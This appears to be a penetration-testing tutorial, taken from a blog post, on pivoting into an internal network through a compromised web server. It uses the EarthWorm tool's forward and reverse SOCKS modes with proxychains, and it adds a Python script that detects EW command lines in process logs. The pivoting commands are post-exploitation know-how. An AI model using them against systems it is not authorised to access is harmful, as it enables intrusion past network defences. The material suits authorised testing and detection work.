Using the intranet forwarding tool EW


In a penetration test, once we have obtained some level of access to an externally facing server (such as a web server, FTP server, or mail server) and found that this server can directly or indirectly reach the internal network, the test enters the post-exploitation stage. Machines in the internal network are generally not reachable from external machines. At this point we can use port forwarding (a tunnel), or set the externally facing server up as a proxy, so that our own attacking machine can directly access and operate other machines in the internal network. This technique is called intranet forwarding.

EW (EarthWorm) combined with proxychains

EW is a portable network tunneling toolkit with two core functions, SOCKS5 service setup and port forwarding, which let it traverse complex network environments. It can build a network tunnel in "forward", "reverse", and "multi-level cascading" modes to reach deep into a network past its restrictions; in the tool's own metaphor, it works like an earthworm loosening the soil around firewalls. The toolkit provides executables for different operating systems: Linux, Windows, MacOS, and Arm-Linux are all covered. It is highly recommended: cross-platform and easy to use on any platform.


Consider the following environment: we have obtained access to a web server located on the public network, and there is another host on the intranet. We now need to set the public web server up as a proxy in order to access and probe the intranet host.

EW forward proxy

Web server settings
Set EW to listen on local port 1080:
ew_for_Win.exe -s ssocksd -l 1080

Linux host settings
Edit the proxychains configuration file and set the proxy to port 1080 of 192.168.137.128:
vim /etc/proxychains4.conf
socks5 192.168.137.128 1080
Then prefix commands with proxychains. For example, to open a remote desktop connection to the intranet host 192.168.52.143:
proxychains rdesktop 192.168.52.143

EW reverse proxy

Web server settings
Set EW to forward all traffic of this machine to port 8888 of 192.168.137.129:
ew_for_Win.exe -s rssocks -d 192.168.137.129 -e 8888

Linux host settings
Set EW to forward the traffic of port 8888 of this machine to port 1080:
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
Then edit the proxychains configuration file and set the proxy to port 1080 of 127.0.0.1:
socks5 127.0.0.1 1080
Then prefix commands with proxychains. For example, to open a remote desktop connection to the intranet host 192.168.52.143:
proxychains rdesktop 192.168.52.143
To access the web service running on the intranet host 192.168.52.143:
proxychains curl http://192.168.52.143/yxcms/
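From the defender's side, the three EW invocations above leave a recognizable argument pattern in process-creation logs. The following is an added example, not part of the original post or of the EW project: it flags those patterns by arguments rather than by binary name. The hostnames, the renamed binary path, and the function names are assumptions made up for the illustration.

```python
# Added example: flag EarthWorm-style command lines in process-creation logs.
# Matching is on the argument pattern, so a renamed binary is still caught.

# Modes used on this page and the flags each one needs to be a real invocation.
EW_MODES = {
    "ssocksd": ("SOCKS5 server listening locally", ("-l",)),
    "rssocks": ("reverse SOCKS5, dials out to a relay", ("-d", "-e")),
    "rcsocks": ("relay listener for a reverse SOCKS5 peer", ("-l", "-e")),
}
PORT_FLAGS = ("-l", "-e")

def _valid_port(value):
    return value.isascii() and value.isdigit() and 1 <= int(value) <= 65535

def classify(cmdline):
    """Return a finding dict for an EW-style command line, else None."""
    tokens = cmdline.split()
    # Map each flag to the token that follows it.
    args = {t: tokens[i + 1] for i, t in enumerate(tokens[:-1]) if t.startswith("-")}
    mode = args.get("-s")
    if mode not in EW_MODES:
        return None
    role, required = EW_MODES[mode]
    if any(f not in args for f in required):
        return None  # e.g. "grep -s rssocks file" has no -d/-e
    if any(not _valid_port(args[f]) for f in required if f in PORT_FLAGS):
        return None
    return {"image": tokens[0], "mode": mode, "role": role,
            "ports": {f: int(args[f]) for f in PORT_FLAGS if f in required},
            "dest": args["-d"] if "-d" in required else None}

def scan(events):
    """events: iterable of (host, cmdline); returns findings tagged with host."""
    return [{"host": h, **hit} for h, c in events if (hit := classify(c))]

# Constructed sample telemetry (hostnames and the renamed path are made up).
SAMPLE_EVENTS = [
    ("web01", r"ew_for_Win.exe -s ssocksd -l 1080"),
    ("web01", r"C:\Windows\Temp\svc_update.exe -s rssocks -d 192.168.137.129 -e 8888"),
    ("linux01", "./ew_for_linux64 -s rcsocks -l 1080 -e 8888"),
    ("web01", "grep -s rssocks access.log"),
    ("db01", "ssh -l admin -e none 10.0.0.5"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A hit on an internet-facing server is worth correlating with network telemetry: an outbound connection to the `dest` address and port for `rssocks`, or a new listener on the reported port for `ssocksd`.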

Origin blog.csdn.net/guo15890025019/article/details/117953485